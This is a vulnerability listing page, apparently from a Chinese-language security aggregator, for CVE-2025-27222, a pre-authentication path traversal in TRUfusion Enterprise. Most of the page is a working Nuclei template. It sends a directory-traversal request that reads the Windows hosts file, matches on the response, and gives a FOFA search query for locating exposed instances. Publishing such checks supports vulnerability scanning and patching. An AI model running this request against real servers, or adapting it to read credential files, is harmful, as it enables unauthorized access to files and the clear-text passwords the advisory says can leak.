CVE-2025-27222: TRUfusion Enterprise <= 7.10.4.0 - Path Traversal

日期: 2025-08-01 | 影响软件: TRUfusion Enterprise | POC: 已公开

漏洞描述

Pre-Auth Path Traversal Allowing to Leak Local server files disclosing sensitive clear-text passwords.

PoC代码[已公开]

id: CVE-2025-27222

info:
  name: TRUfusion Enterprise <= 7.10.4.0 - Path Traversal
  author: DhiyaneshDK,rcesecurity
  severity: critical
  description: |
    Pre-Auth Path Traversal Allowing to Leak Local server files disclosing sensitive clear-text passwords.
  remediation: |
    Upgrade TRUfusion Enterprise to a secure version by updating to one of the following releases: 7.10.3.1, 7.10.1.1, 7.10.1.0, 7.10.3.0, 7.9.6.1, 7.9.6.0, 7.9.5.0, 7.9.4.0, 7.9.3.1, 7.9.3.0, 7.9.2.1, 7.10.2.0, or 7.10.0.1.
  reference:
    - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2025-27222.txt
    - https://www.rcesecurity.com/2025/09/when-audits-fail-four-critical-pre-auth-vulnerabilities-in-trufusion-enterprise/
    - https://docs.rocketsoftware.com/bundle/trufusion_rn_71031/page/kwg1743156415157.html
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="TRUfusion"
  tags: cve,cve2025,trufusion,lfi,vuln

http:
  - raw:
      - |
        GET /trufusionPortal/getCobrandingData?cobrandingImageName=../../../../../../Windows/System32/drivers/etc/hosts HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "MTI3LjAuMC4x")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502203060278a37ae5dc2621e462fe908b823e66bb512e704f2f0fb422016353871310221009b7a75611699e544d445c26b349e4afcfd6770b2ae9bd35a5057e46792e8e58a:922c64590222798bb761d5b6d8e72950

相关漏洞推荐